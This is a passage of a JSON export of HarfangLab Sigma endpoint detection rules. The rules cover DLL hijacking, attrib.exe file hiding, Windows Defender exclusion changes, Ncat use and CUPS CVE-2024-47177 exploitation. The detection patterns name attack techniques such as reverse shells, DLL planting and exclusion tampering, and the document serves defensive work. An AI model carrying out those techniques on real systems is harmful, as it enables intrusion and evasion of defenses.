to plant a manage-bde.exe binary in the current directory to execute it rather than the legitimate binary in System32.\nAttackers may abuse it to bypass security restrictions.\nThis script which is used to manage BitLocker and has been deprecated since Windows 7 while manage-bde.exe should be used instead.\nIt is recommended to analyze the process responsible for the execution of the manage-bde.wsf script to look for malicious content and other suspicious actions.\n", "rule_creation_date": "2022-01-27", "rule_modified_date": "2025-01-09", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1216" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "222c898a-8fe8-430e-9b10-8075c5f1ca5c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "low", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.620258Z", "creation_date": "2026-03-23T11:45:34.620260Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.620264Z", "rule_level": "low", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/", "https://attack.mitre.org/techniques/T1564/001/" ], "name": "t1564_001_file_hidden_through_attrib.yml", "content": "title: File or Directory Hidden via Attrib.exe\nid: 222c898a-8fe8-430e-9b10-8075c5f1ca5c\ndescription: |\n Detects when files/directories are set as Hidden and System through using attrib.exe.\n This technique can be used by an attacker to hide sensitives directories and/or tools.\n It is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\nreferences:\n - https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2020/12/04\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image: '*\\attrib.exe'\n CommandLine|contains|all:\n - '+h' # hidden\n - '+s' # system\n\n exclusion_desktop_ini:\n # attrib +s +h C:\\3DEXPERIENCE/desktop.ini\n CommandLine|endswith:\n - '/desktop.ini'\n - '\\desktop.ini'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_samsung_link:\n CommandLine|contains: '?:\\ProgramData\\Samsung\\Samsung Link\\SamsungLink.lock'\n\n exclusion_samsung_link_tray:\n CommandLine|contains: 'AppData\\Roaming\\SAMSUNG\\Samsung Link\\ASPAgent.lock'\n\n exclusion_intel_gfx_cui:\n # Intel Common User Interface GFX execute a bat that hides all cui files in 'C:\\Windows\\System32\\'\n #GrandparentImage: '?:\\Windows\\System32\\igfxCUIService.exe'\n ParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c ?:\\Windows\\system32\\{????????-????-????-????-????????????}.bat'\n CommandLine:\n - 'attrib *+R +H +S +A ?.cui'\n # Workaround for issue 18 (fixed in 2.8.1 and upper)\n - 'attrib +R +H +S +A ?.cui'\n - 'attrib +R +H +S +A ?.cui'\n\n exclusion_razer:\n CommandLine: 'attrib +h +s ?:\\Users\\\\*\\AppData\\Local\\Razer\\RazerAxon\\WallpaperSource\\\\*'\n GrandparentImage: '?:\\Program Files (x86)\\Razer\\Razer Axon\\RazerAxon.exe'\n\n exclusion_syngo:\n CommandLine: '?:\\Windows\\system32\\attrib.exe +s +h \\\\.\\GLOBALROOT\\device\\harddisk0\\partition3\\Recovery\\WindowsRE\\winre.wim'\n ParentCommandLine: 'powershell.exe -ExecutionPolicy Bypass -command try{.\\InstallRAIDdriver.ps1 ?:\\Store\\Log\\Installation\\FieldUpdater\\\\*\\; exit $lastexitcode}catch{echo Exception-message: $_.Exception.Message;exit 1}'\n\n # https://gist.github.com/pknowledge/1feef32fa21475eb9742ea247aefe1af\n exclusion_folder_private:\n CommandLine: 'attrib +h +s Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}'\n ParentCommandLine: '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\\\*.bat'\n\n exclusion_hp:\n CommandLine:\n - 'attrib +r +h +s ?:\\hp'\n - 'attrib +r +h +s ?:\\system.sav'\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c ?:\\system.sav\\logs\\RunFLC.cmd'\n GrandparentImage: '?:\\Windows\\System32\\runonce.exe'\n\n exclusion_blackmagic:\n CommandLine: 'attrib +h +s */auto_Uninstall.qs'\n GrandparentImage|endswith: '\\Blackmagic_Fairlight_Sound_Library_Windows.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "222c898a-8fe8-430e-9b10-8075c5f1ca5c", "rule_name": "File or Directory Hidden via Attrib.exe", "rule_description": "Detects when files/directories are set as Hidden and System through using attrib.exe.\nThis technique can be used by an attacker to hide sensitives directories and/or tools.\nIt is recommended to examine the process tree associated with this process to understand the execution context and to determine the legitimacy of this action.\n", "rule_creation_date": "2020-12-04", "rule_modified_date": "2026-03-16", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1564.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "224d53d5-5b47-46d6-bae7-c97ed2c94fed", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093020Z", "creation_date": "2026-03-23T11:45:34.093022Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093027Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_srtasks.yml", "content": "title: DLL Hijacking via srtasks.exe\nid: 224d53d5-5b47-46d6-bae7-c97ed2c94fed\ndescription: |\n Detects potential Windows DLL Hijacking via srtasks.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'srtasks.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\ktmw32.dll'\n - '\\SPP.dll'\n - '\\SRCLIENT.dll'\n - '\\SRCORE.dll'\n - '\\VSSAPI.DLL'\n - '\\VssTrace.DLL'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "224d53d5-5b47-46d6-bae7-c97ed2c94fed", "rule_name": "DLL Hijacking via srtasks.exe", "rule_description": "Detects potential Windows DLL Hijacking via srtasks.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "22822193-9f29-4f1e-8001-93546cec1e4a", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.610942Z", "creation_date": "2026-03-23T11:45:34.610945Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.610953Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://attack.mitre.org/techniques/T1562/001/" ], "name": "t1562_001_windows_defender_add_exclusion.yml", "content": "title: Windows Defender Exclusion List Modified\nid: 22822193-9f29-4f1e-8001-93546cec1e4a\ndescription: |\n Detects the modification of Windows Defender's exclusion list.\n Adversaries may modify the exclusion list to avoid possible detection of their tools.\n It is recommended to ensure this new exclusion is legitimate as well as to look for other suspicious actions on the affected host.\nreferences:\n - https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2020/09/25\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|startswith:\n # NOTE: Even when using PowerShell (via Add-MpPreference), msmpeng is always the one doing this operation.\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\'\n\n filter_empty:\n Details: '(Empty)'\n\n exclusion_hurukai:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\\\?:\\Program Files\\HarfangLab'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\\\?:\\Program Files\\HarfangLab\\\\*'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\\\?:\\Program Files\\HarfangLab'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\\\?:\\Program Files\\HarfangLab\\\\*'\n Details: 'DWORD (0x00000000)'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "22822193-9f29-4f1e-8001-93546cec1e4a", "rule_name": "Windows Defender Exclusion List Modified", "rule_description": "Detects the modification of Windows Defender's exclusion list.\nAdversaries may modify the exclusion list to avoid possible detection of their tools.\nIt is recommended to ensure this new exclusion is legitimate as well as to look for other suspicious actions on the affected host.\n", "rule_creation_date": "2020-09-25", "rule_modified_date": "2025-04-14", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1112", "attack.t1562.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "228c8306-0e42-40a0-89b5-bdbf8a539ddb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.604822Z", "creation_date": "2026-03-23T11:45:34.604826Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.604833Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://nmap.org/ncat/", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md#atomic-test-2---netcat-c2", "https://attack.mitre.org/techniques/T1049/", "https://attack.mitre.org/techniques/T1095/" ], "name": "t1049_ncat.yml", "content": "title: Ncat Execution\nid: 228c8306-0e42-40a0-89b5-bdbf8a539ddb\ndescription: |\n Detects the execution of Ncat, a feature-packed networking utility which reads and writes data across networks from command-line.\n Ncat was written for the Nmap Project as a much-improved reimplementation of Netcat.\n Attackers can use ncat to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\n It is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\nreferences:\n - https://nmap.org/ncat/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md#atomic-test-2---netcat-c2\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2022/08/17\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.command_and_control\n - attack.t1095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Ncat\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # by default Ncat is signed by Insecure.Com LLC\n Imphash: '424b839c413b54caf852f99fc5055a49'\n\n condition: selection\nlevel: medium\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "228c8306-0e42-40a0-89b5-bdbf8a539ddb", "rule_name": "Ncat Execution", "rule_description": "Detects the execution of Ncat, a feature-packed networking utility which reads and writes data across networks from command-line.\nNcat was written for the Nmap Project as a much-improved reimplementation of Netcat.\nAttackers can use ncat to perform malicious activities such as reconnaissance, lateral movement, reverse shell, etc.\nIt is recommended to analyze the parent process and context as well as to correlate this alert with other discovery commands executed around it.\n", "rule_creation_date": "2022-08-17", "rule_modified_date": "2025-01-31", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.discovery" ], "rule_technique_tags": [ "attack.t1049", "attack.t1095" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "22e5297e-5d7b-4785-82f5-62dea6132903", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.602458Z", "creation_date": "2026-03-23T11:45:34.602461Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.602469Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_printbrmui.yml", "content": "title: DLL Hijacking via printbrmui.exe\nid: 22e5297e-5d7b-4785-82f5-62dea6132903\ndescription: |\n Detects potential Windows DLL Hijacking via printbrmui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'printbrmui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "22e5297e-5d7b-4785-82f5-62dea6132903", "rule_name": "DLL Hijacking via printbrmui.exe", "rule_description": "Detects potential Windows DLL Hijacking via printbrmui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2307c08f-aa49-4fa1-a3d5-d2a849e2bf17", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.625154Z", "creation_date": "2026-03-23T11:45:34.625156Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.625160Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/", "https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1", "https://www.elastic.co/security-labs/cups-overflow", "https://attack.mitre.org/techniques/T1203/" ], "name": "cve_2024_47177_cupsd_foomatic_rip_shell_execution.yml", "content": "title: CUPS CVE-2024-47177 Vulnerability Exploited\nid: 2307c08f-aa49-4fa1-a3d5-d2a849e2bf17\ndescription: |\n Detects the suspicious creation of child processes by the foomatic-rip process related to the exploitation of the CUPS (Common UNIX Printing System) vulnerability.\n This detection rule is related to multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.\n These flaws allow for remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing.\n This can result in arbitrary command execution when a print job is initiated.\n It is recommended to investigate the command-line performing this action to determine its legitimacy.\nreferences:\n - https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/\n - https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1\n - https://www.elastic.co/security-labs/cups-overflow\n - https://attack.mitre.org/techniques/T1203/\ndate: 2024/10/02\nmodified: 2025/12/17\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - cve.2024-47177\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CUPS\n - classification.Linux.Exploit.CVE-2024-47177\nlogsource:\n product: linux\n category: process_creation\ndetection:\n selection:\n ProcessParentImage|endswith: '/foomatic-rip'\n sha256|contains: '?' # at least one character, some SHA256 are empty\n\n filter_image:\n ProcessImage:\n - '/usr/bin/foomatic-rip'\n - '/usr/lib/cups/filter/foomatic-rip'\n - '/usr/bin/cat'\n - '/usr/bin/gs'\n\n filter_gs:\n ProcessCommandLine|contains|all:\n - ' -c '\n - ' gs '\n - ' -dBATCH'\n - ' -dNOPAUSE'\n - ' -sDEVICE'\n\n exclusion_plg:\n ProcessCommandLine|contains|all:\n - '@PJL SET COPIES'\n - ' -dPARANOIDSAFER '\n - ' -sDEVICE='\n - ' -sOutputFile='\n\n exclusion_epson:\n ProcessParentCommandLine|contains|all:\n - 'Collate finishings='\n - 'number-up='\n - 'job-uuid='\n - 'job-originating-host-name='\n - 'time-at-creation='\n - 'time-at-processing='\n CommandLine|startswith: 'perl -p -e if (! $did) {'\n\n exclusion_printer_payloads:\n ProcessCommandLine|contains:\n # These payloads are from legitimate printer software/tools, primarily used during the pre-printing process.\n - '-c printf \"%%!PS-Adobe-3.0'\n - '/bin/sh -e -c foo2zjs-wrapper '\n - 'ipp://localhost/printers/'\n - '/pdffile (/tmp/foomatic-'\n - '/bin/sh -e -c pdftops '\n - '/var/spool/cups/tmp/foomatic-*'\n - '/bin/sh -e -c foo2xqx-wrapper '\n - '/bin/bash -e -c /bin/cat - | sicgsfilter '\n\n exclusion_cat:\n ProcessCommandLine:\n - '/bin/sh -e -c cat'\n - '/bin/bash -c cat'\n - '/bin/bash -e -c cat'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2307c08f-aa49-4fa1-a3d5-d2a849e2bf17", "rule_name": "CUPS CVE-2024-47177 Vulnerability Exploited", "rule_description": "Detects the suspicious creation of child processes by the foomatic-rip process related to the exploitation of the CUPS (Common UNIX Printing System) vulnerability.\nThis detection rule is related to multiple vulnerabilities in the CUPS printing system, including CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.\nThese flaws allow for remote unauthenticated attackers to manipulate IPP URLs or inject malicious data through crafted UDP packets or network spoofing.\nThis can result in arbitrary command execution when a print job is initiated.\nIt is recommended to investigate the command-line performing this action to determine its legitimacy.\n", "rule_creation_date": "2024-10-02", "rule_modified_date": "2025-12-17", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.execution" ], "rule_technique_tags": [ "attack.t1203" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2312ad6d-35cc-45d7-83a7-08f4131d32b0", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.600939Z", "creation_date": "2026-03-23T11:45:34.600943Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.600951Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_winlogon.yml", "content": "title: DLL Hijacking via winlogon.exe\nid: 2312ad6d-35cc-45d7-83a7-08f4131d32b0\ndescription: |\n Detects potential Windows DLL Hijacking via winlogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winlogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\UXINIT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2312ad6d-35cc-45d7-83a7-08f4131d32b0", "rule_name": "DLL Hijacking via winlogon.exe", "rule_description": "Detects potential Windows DLL Hijacking via winlogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": 